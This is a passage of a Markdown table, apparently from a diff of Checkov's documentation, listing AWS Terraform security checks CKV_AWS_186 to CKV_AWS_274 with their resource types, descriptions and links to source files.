managed Key (CMK) | Terraform | [KinesisStreamEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisStreamEncryptedWithCMK.py) 
| -| 275 | CKV_AWS_186 | resource | aws_s3_bucket_object | Ensure S3 bucket Object is encrypted by KMS using a customer managed Key (CMK) | Terraform | [S3BucketObjectEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3BucketObjectEncryptedWithCMK.py) | -| 276 | CKV_AWS_187 | resource | aws_sagemaker_domain | Ensure Sagemaker domain is encrypted by KMS using a customer managed Key (CMK) | Terraform | [SagemakerDomainEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerDomainEncryptedWithCMK.py) | -| 277 | CKV_AWS_189 | resource | aws_ebs_volume | Ensure EBS Volume is encrypted by KMS using a customer managed Key (CMK) | Terraform | [EBSVolumeEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EBSVolumeEncryptedWithCMK.py) | -| 278 | CKV_AWS_190 | resource | aws_fsx_lustre_file_system | Ensure lustre file systems is encrypted by KMS using a customer managed Key (CMK) | Terraform | [LustreFSEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LustreFSEncryptedWithCMK.py) | -| 279 | CKV_AWS_191 | resource | aws_elasticache_replication_group | Ensure ElastiCache replication group is encrypted by KMS using a customer managed Key (CMK) | Terraform | [ElasticacheReplicationGroupEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptedWithCMK.py) | -| 280 | CKV_AWS_192 | resource | aws_wafv2_web_acl | Ensure WAF prevents message lookup in Log4j2. 
See CVE-2021-44228 aka log4jshell | Terraform | [WAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFACLCVE202144228.py) | -| 281 | CKV_AWS_193 | resource | aws_appsync_graphql_api | Ensure AppSync has Logging enabled | Terraform | [AppSyncLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppSyncLogging.py) | -| 282 | CKV_AWS_194 | resource | aws_appsync_graphql_api | Ensure AppSync has Field-Level logs enabled | Terraform | [AppSyncFieldLevelLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppSyncFieldLevelLogs.py) | -| 283 | CKV_AWS_195 | resource | aws_glue_crawler | Ensure Glue component has a security configuration associated | Terraform | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | -| 284 | CKV_AWS_195 | resource | aws_glue_dev_endpoint | Ensure Glue component has a security configuration associated | Terraform | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | -| 285 | CKV_AWS_195 | resource | aws_glue_job | Ensure Glue component has a security configuration associated | Terraform | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | -| 286 | CKV_AWS_196 | resource | aws_elasticache_security_group | Ensure no aws_elasticache_security_group resources exist | Terraform | [ElasticacheHasSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheHasSecurityGroup.py) | -| 287 | CKV_AWS_197 | resource | aws_mq_broker | Ensure MQ Broker Audit logging is enabled | Terraform | 
[MQBrokerAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerAuditLogging.py) | -| 288 | CKV_AWS_198 | resource | aws_db_security_group | Ensure no aws_db_security_group resources exist | Terraform | [RDSHasSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSHasSecurityGroup.py) | -| 289 | CKV_AWS_199 | resource | aws_imagebuilder_distribution_configuration | Ensure Image Builder Distribution Configuration encrypts AMI's using KMS - a customer managed Key (CMK) | Terraform | [ImagebuilderDistributionConfigurationEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ImagebuilderDistributionConfigurationEncryptedWithCMK.py) | -| 290 | CKV_AWS_200 | resource | aws_imagebuilder_image_recipe | Ensure that Image Recipe EBS Disk are encrypted with CMK | Terraform | [ImagebuilderImageRecipeEBSEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ImagebuilderImageRecipeEBSEncrypted.py) | -| 291 | CKV_AWS_201 | resource | aws_memorydb_cluster | Ensure MemoryDB is encrypted at rest using KMS CMKs | Terraform | [MemoryDBEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MemoryDBEncryptionWithCMK.py) | -| 292 | CKV_AWS_202 | resource | aws_memorydb_cluster | Ensure MemoryDB data is encrypted in transit | Terraform | [MemoryDBClusterIntransitEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MemoryDBClusterIntransitEncryption.py) | -| 293 | CKV_AWS_203 | resource | aws_fsx_openzfs_file_system | Ensure resource is encrypted by KMS using a customer managed Key (CMK) | Terraform | [FSXOpenZFSFileSystemEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/FSXOpenZFSFileSystemEncryptedWithCMK.py) | -| 
294 | CKV_AWS_204 | resource | aws_ami | Ensure AMIs are encrypted using KMS CMKs | Terraform | [AMIEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AMIEncryption.py) | -| 295 | CKV_AWS_205 | resource | aws_ami_launch_permission | Ensure to Limit AMI launch Permissions | Terraform | [AMILaunchIsShared.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AMILaunchIsShared.py) | -| 296 | CKV_AWS_206 | resource | aws_api_gateway_domain_name | Ensure API Gateway Domain uses a modern security Policy | Terraform | [APIGatewayDomainNameTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayDomainNameTLS.py) | -| 297 | CKV_AWS_207 | resource | aws_mq_broker | Ensure MQ Broker minor version updates are enabled | Terraform | [MQBrokerMinorAutoUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerMinorAutoUpgrade.py) | -| 298 | CKV_AWS_208 | resource | aws_mq_broker | Ensure MQ Broker version is current | Terraform | [MQBrokerVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerVersion.py) | -| 299 | CKV_AWS_208 | resource | aws_mq_configuration | Ensure MQ Broker version is current | Terraform | [MQBrokerVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerVersion.py) | -| 300 | CKV_AWS_209 | resource | aws_mq_broker | Ensure MQ broker encrypted by KMS using a customer managed Key (CMK) | Terraform | [MQBrokerEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerEncryptedWithCMK.py) | -| 301 | CKV_AWS_210 | resource | aws_batch_job_definition | Batch job does not define a privileged container | Terraform | 
[BatchJobIsNotPrivileged.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/BatchJobIsNotPrivileged.py) | -| 302 | CKV_AWS_211 | resource | aws_db_instance | Ensure RDS uses a modern CaCert | Terraform | [RDSCACertIsRecent.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSCACertIsRecent.py) | -| 303 | CKV_AWS_212 | resource | aws_dms_replication_instance | Ensure DMS replication instance is encrypted by KMS using a customer managed Key (CMK) | Terraform | [DMSReplicationInstanceEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSReplicationInstanceEncryptedWithCMK.py) | -| 304 | CKV_AWS_213 | resource | aws_load_balancer_policy | Ensure ELB Policy uses only secure protocols | Terraform | [ELBPolicyUsesSecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBPolicyUsesSecureProtocols.py) | -| 305 | CKV_AWS_214 | resource | aws_appsync_api_cache | Ensure AppSync API Cache is encrypted at rest | Terraform | [AppsyncAPICacheEncryptionAtRest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppsyncAPICacheEncryptionAtRest.py) | -| 306 | CKV_AWS_215 | resource | aws_appsync_api_cache | Ensure AppSync API Cache is encrypted in transit | Terraform | [AppsyncAPICacheEncryptionInTransit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppsyncAPICacheEncryptionInTransit.py) | -| 307 | CKV_AWS_216 | resource | aws_cloudfront_distribution | Ensure CloudFront distribution is enabled | Terraform | [CloudfrontDistributionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionEnabled.py) | -| 308 | CKV_AWS_217 | resource | aws_api_gateway_deployment | Ensure Create before destroy for API deployments | Terraform | 
[APIGatewayDeploymentCreateBeforeDestroy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayDeploymentCreateBeforeDestroy.py) | -| 309 | CKV_AWS_218 | resource | aws_cloudsearch_domain | Ensure that CloudSearch is using latest TLS | Terraform | [CloudsearchDomainTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudsearchDomainTLS.py) | -| 310 | CKV_AWS_219 | resource | aws_codepipeline | Ensure CodePipeline Artifact store is using a KMS CMK | Terraform | [CodePipelineArtifactsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodePipelineArtifactsEncrypted.py) | -| 311 | CKV_AWS_220 | resource | aws_cloudsearch_domain | Ensure that CloudSearch is using https | Terraform | [CloudsearchDomainEnforceHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudsearchDomainEnforceHttps.py) | -| 312 | CKV_AWS_221 | resource | aws_codeartifact_domain | Ensure CodeArtifact Domain is encrypted by KMS using a customer managed Key (CMK) | Terraform | [CodeArtifactDomainEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodeArtifactDomainEncryptedWithCMK.py) | -| 313 | CKV_AWS_222 | resource | aws_dms_replication_instance | Ensure DMS replication instance gets all minor upgrade automatically | Terraform | [DMSReplicationInstanceMinorUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSReplicationInstanceMinorUpgrade.py) | -| 314 | CKV_AWS_223 | resource | aws_ecs_cluster | Ensure ECS Cluster enables logging of ECS Exec | Terraform | [ECSClusterLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSClusterLoggingEnabled.py) | -| 315 | CKV_AWS_224 | resource | aws_ecs_cluster | Ensure ECS Cluster logging uses CMK | Terraform | 
[ECSClusterLoggingEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSClusterLoggingEncryptedWithCMK.py) | -| 316 | CKV_AWS_225 | resource | aws_api_gateway_method_settings | Ensure API Gateway method setting caching is enabled | Terraform | [APIGatewayMethodSettingsCacheEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayMethodSettingsCacheEnabled.py) | -| 317 | CKV_AWS_226 | resource | aws_db_instance | Ensure DB instance gets all minor upgrades automatically | Terraform | [DBInstanceMinorUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceMinorUpgrade.py) | -| 318 | CKV_AWS_226 | resource | aws_rds_cluster_instance | Ensure DB instance gets all minor upgrades automatically | Terraform | [DBInstanceMinorUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceMinorUpgrade.py) | -| 319 | CKV_AWS_227 | resource | aws_kms_key | Ensure KMS key is enabled | Terraform | [KMSKeyIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KMSKeyIsEnabled.py) | -| 320 | CKV_AWS_228 | resource | aws_elasticsearch_domain | Verify Elasticsearch domain is using an up to date TLS policy | Terraform | [ElasticsearchTLSPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchTLSPolicy.py) | -| 321 | CKV_AWS_228 | resource | aws_opensearch_domain | Verify Elasticsearch domain is using an up to date TLS policy | Terraform | [ElasticsearchTLSPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchTLSPolicy.py) | -| 322 | CKV_AWS_229 | resource | aws_network_acl | Ensure no NACL allow ingress from 0.0.0.0:0 to port 21 | Terraform | 
[NetworkACLUnrestrictedIngress21.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress21.py) | -| 323 | CKV_AWS_229 | resource | aws_network_acl_rule | Ensure no NACL allow ingress from 0.0.0.0:0 to port 21 | Terraform | [NetworkACLUnrestrictedIngress21.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress21.py) | -| 324 | CKV_AWS_230 | resource | aws_network_acl | Ensure no NACL allow ingress from 0.0.0.0:0 to port 20 | Terraform | [NetworkACLUnrestrictedIngress20.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress20.py) | -| 325 | CKV_AWS_230 | resource | aws_network_acl_rule | Ensure no NACL allow ingress from 0.0.0.0:0 to port 20 | Terraform | [NetworkACLUnrestrictedIngress20.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress20.py) | -| 326 | CKV_AWS_231 | resource | aws_network_acl | Ensure no NACL allow ingress from 0.0.0.0:0 to port 3389 | Terraform | [NetworkACLUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress3389.py) | -| 327 | CKV_AWS_231 | resource | aws_network_acl_rule | Ensure no NACL allow ingress from 0.0.0.0:0 to port 3389 | Terraform | [NetworkACLUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress3389.py) | -| 328 | CKV_AWS_232 | resource | aws_network_acl | Ensure no NACL allow ingress from 0.0.0.0:0 to port 22 | Terraform | [NetworkACLUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress22.py) | -| 329 | CKV_AWS_232 | resource | aws_network_acl_rule | Ensure no NACL allow ingress from 0.0.0.0:0 to 
port 22 | Terraform | [NetworkACLUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress22.py) | -| 330 | CKV_AWS_233 | resource | aws_acm_certificate | Ensure Create before destroy for ACM certificates | Terraform | [ACMCertCreateBeforeDestroy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ACMCertCreateBeforeDestroy.py) | -| 331 | CKV_AWS_234 | resource | aws_acm_certificate | Verify logging preference for ACM certificates | Terraform | [ACMCertSetLoggingPreference.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ACMCertSetLoggingPreference.py) | -| 332 | CKV_AWS_235 | resource | aws_ami_copy | Ensure that copied AMIs are encrypted | Terraform | [AMICopyIsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AMICopyIsEncrypted.py) | -| 333 | CKV_AWS_236 | resource | aws_ami_copy | Ensure AMI copying uses a CMK | Terraform | [AMICopyUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AMICopyUsesCMK.py) | -| 334 | CKV_AWS_237 | resource | aws_api_gateway_rest_api | Ensure Create before destroy for API Gateway | Terraform | [APIGatewayCreateBeforeDestroy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayCreateBeforeDestroy.py) | -| 335 | CKV_AWS_238 | resource | aws_guardduty_detector | Ensure that GuardDuty detector is enabled | Terraform | [GuarddutyDetectorEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GuarddutyDetectorEnabled.py) | -| 336 | CKV_AWS_239 | resource | aws_dax_cluster | Ensure DAX cluster endpoint is using TLS | Terraform | [DAXEndpointTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DAXEndpointTLS.py) | -| 337 | CKV_AWS_240 | 
resource | aws_kinesis_firehose_delivery_stream | Ensure Kinesis Firehose delivery stream is encrypted | Terraform | [KinesisFirehoseDeliveryStreamSSE.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisFirehoseDeliveryStreamSSE.py) |
-| 338 | CKV_AWS_241 | resource | aws_kinesis_firehose_delivery_stream | Ensure that Kinesis Firehose Delivery Streams are encrypted with CMK | Terraform | [KinesisFirehoseDeliveryStreamUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisFirehoseDeliveryStreamUsesCMK.py) |
-| 339 | CKV_AWS_242 | resource | aws_mwaa_environment | Ensure MWAA environment has scheduler logs enabled | Terraform | [MWAASchedulerLogsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MWAASchedulerLogsEnabled.py) |
-| 340 | CKV_AWS_243 | resource | aws_mwaa_environment | Ensure MWAA environment has worker logs enabled | Terraform | [MWAAWorkerLogsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MWAAWorkerLogsEnabled.py) |
-| 341 | CKV_AWS_244 | resource | aws_mwaa_environment | Ensure MWAA environment has webserver logs enabled | Terraform | [MWAAWebserverLogsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MWAAWebserverLogsEnabled.py) |
-| 342 | CKV_AWS_245 | resource | aws_db_instance_automated_backups_replication | Ensure replicated backups are encrypted at rest using KMS CMKs | Terraform | [RDSInstanceAutoBackupEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstanceAutoBackupEncryptionWithCMK.py) |
-| 343 | CKV_AWS_246 | resource | aws_rds_cluster_activity_stream | Ensure RDS Cluster activity streams are encrypted using KMS CMKs | Terraform | [RDSClusterActivityStreamEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterActivityStreamEncryptedWithCMK.py) |
-| 344 | CKV_AWS_247 | resource | aws_elasticsearch_domain | Ensure all data stored in the Elasticsearch is encrypted with a CMK | Terraform | [ElasticsearchEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchEncryptionWithCMK.py) |
-| 345 | CKV_AWS_247 | resource | aws_opensearch_domain | Ensure all data stored in the Elasticsearch is encrypted with a CMK | Terraform | [ElasticsearchEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchEncryptionWithCMK.py) |
-| 346 | CKV_AWS_248 | resource | aws_elasticsearch_domain | Ensure that Elasticsearch is not using the default Security Group | Terraform | [ElasticsearchDefaultSG.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDefaultSG.py) |
-| 347 | CKV_AWS_248 | resource | aws_opensearch_domain | Ensure that Elasticsearch is not using the default Security Group | Terraform | [ElasticsearchDefaultSG.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDefaultSG.py) |
-| 348 | CKV_AWS_249 | resource | aws_ecs_task_definition | Ensure that the Execution Role ARN and the Task Role ARN are different in ECS Task definitions | Terraform | [ECSTaskDefinitionRoleCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSTaskDefinitionRoleCheck.py) |
-| 349 | CKV_AWS_250 | resource | aws_db_instance | Ensure that RDS PostgreSQL instances use a non vulnerable version with the log_fdw extension (https://aws.amazon.com/security/security-bulletins/AWS-2022-004/) | Terraform | [RDSPostgreSQLLogFDWExtension.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSPostgreSQLLogFDWExtension.py) |
-| 350 | CKV_AWS_250 | resource | aws_rds_cluster | Ensure that RDS PostgreSQL instances use a non vulnerable version with the log_fdw extension (https://aws.amazon.com/security/security-bulletins/AWS-2022-004/) | Terraform | [RDSPostgreSQLLogFDWExtension.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSPostgreSQLLogFDWExtension.py) |
-| 351 | CKV_AWS_251 | resource | aws_cloudtrail | Ensure CloudTrail logging is enabled | Terraform | [CloudtrailEnableLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailEnableLogging.py) |
-| 352 | CKV_AWS_252 | resource | aws_cloudtrail | Ensure CloudTrail defines an SNS Topic | Terraform | [CloudtrailDefinesSNSTopic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailDefinesSNSTopic.py) |
-| 353 | CKV_AWS_253 | resource | aws_dlm_lifecycle_policy | Ensure DLM cross region events are encrypted | Terraform | [DLMEventsCrossRegionEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DLMEventsCrossRegionEncryption.py) |
-| 354 | CKV_AWS_254 | resource | aws_dlm_lifecycle_policy | Ensure DLM cross region events are encrypted with Customer Managed Key | Terraform | [DLMEventsCrossRegionEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DLMEventsCrossRegionEncryptionWithCMK.py) |
-| 355 | CKV_AWS_255 | resource | aws_dlm_lifecycle_policy | Ensure DLM cross region schedules are encrypted | Terraform | [DLMScheduleCrossRegionEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DLMScheduleCrossRegionEncryption.py) |
-| 356 | CKV_AWS_256 | resource | aws_dlm_lifecycle_policy | Ensure DLM cross region schedules are encrypted using a Customer Managed Key | Terraform | [DLMScheduleCrossRegionEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DLMScheduleCrossRegionEncryptionWithCMK.py) |
-| 357 | CKV_AWS_257 | resource | aws_codecommit_approval_rule_template | Ensure CodeCommit branch changes have at least 2 approvals | Terraform | [CodecommitApprovalsRulesRequireMin2.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodecommitApprovalsRulesRequireMin2.py) |
-| 358 | CKV_AWS_258 | resource | aws_lambda_function_url | Ensure that Lambda function URLs AuthType is not None | Terraform | [LambdaFunctionURLAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaFunctionURLAuth.py) |
-| 359 | CKV_AWS_259 | resource | aws_cloudfront_response_headers_policy | Ensure CloudFront response header policy enforces Strict Transport Security | Terraform | [CloudFrontResponseHeaderStrictTransportSecurity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudFrontResponseHeaderStrictTransportSecurity.py) |
-| 360 | CKV_AWS_260 | resource | aws_security_group | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80 | Terraform | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py) |
-| 361 | CKV_AWS_260 | resource | aws_security_group_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80 | Terraform | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py) |
-| 362 | CKV_AWS_260 | resource | aws_vpc_security_group_ingress_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80 | Terraform | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py) |
-| 363 | CKV_AWS_261 | resource | aws_alb_target_group | Ensure HTTP HTTPS Target group defines Healthcheck | Terraform | [LBTargetGroupsDefinesHealthcheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBTargetGroupsDefinesHealthcheck.py) |
-| 364 | CKV_AWS_261 | resource | aws_lb_target_group | Ensure HTTP HTTPS Target group defines Healthcheck | Terraform | [LBTargetGroupsDefinesHealthcheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBTargetGroupsDefinesHealthcheck.py) |
-| 365 | CKV_AWS_262 | resource | aws_kendra_index | Ensure Kendra index Server side encryption uses CMK | Terraform | [KendraIndexSSEUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KendraIndexSSEUsesCMK.py) |
-| 366 | CKV_AWS_263 | resource | aws_appflow_flow | Ensure AppFlow flow uses CMK | Terraform | [AppFlowUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppFlowUsesCMK.py) |
-| 367 | CKV_AWS_264 | resource | aws_appflow_connector_profile | Ensure AppFlow connector profile uses CMK | Terraform | [AppFlowConnectorProfileUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppFlowConnectorProfileUsesCMK.py) |
-| 368 | CKV_AWS_265 | resource | aws_keyspaces_table | Ensure Keyspaces Table uses CMK | Terraform | [KeyspacesTableUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KeyspacesTableUsesCMK.py) |
-| 369 | CKV_AWS_266 | resource | aws_db_snapshot_copy | Ensure DB Snapshot copy uses CMK | Terraform | [DBSnapshotCopyUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBSnapshotCopyUsesCMK.py) |
-| 370 | CKV_AWS_267 | resource | aws_comprehend_entity_recognizer | Ensure that Comprehend Entity Recognizer's model is encrypted by KMS using a customer managed Key (CMK) | Terraform | [ComprehendEntityRecognizerModelUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ComprehendEntityRecognizerModelUsesCMK.py) |
-| 371 | CKV_AWS_268 | resource | aws_comprehend_entity_recognizer | Ensure that Comprehend Entity Recognizer's volume is encrypted by KMS using a customer managed Key (CMK) | Terraform | [ComprehendEntityRecognizerVolumeUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ComprehendEntityRecognizerVolumeUsesCMK.py) |
-| 372 | CKV_AWS_269 | resource | aws_connect_instance_storage_config | Ensure Connect Instance Kinesis Video Stream Storage Config uses CMK | Terraform | [ConnectInstanceKinesisVideoStreamStorageConfigUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ConnectInstanceKinesisVideoStreamStorageConfigUsesCMK.py) |
-| 373 | CKV_AWS_270 | resource | aws_connect_instance_storage_config | Ensure Connect Instance S3 Storage Config uses CMK | Terraform | [ConnectInstanceS3StorageConfigUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ConnectInstanceS3StorageConfigUsesCMK.py) |
-| 374 | CKV_AWS_271 | resource | aws_dynamodb_table_replica | Ensure DynamoDB table replica KMS encryption uses CMK | Terraform | [DynamoDBTableReplicaKMSUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DynamoDBTableReplicaKMSUsesCMK.py) |
-| 375 | CKV_AWS_272 | resource | aws_lambda_function | Ensure AWS Lambda function is configured to validate code-signing | Terraform | [LambdaCodeSigningConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaCodeSigningConfigured.py) |
-| 376 | CKV_AWS_273 | resource | aws_iam_user | Ensure access is controlled through SSO and not AWS IAM defined users | Terraform | [IAMUserNotUsedForAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMUserNotUsedForAccess.py) |
-| 377 | CKV_AWS_274 | resource | aws_iam_group_policy_attachment | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py) |
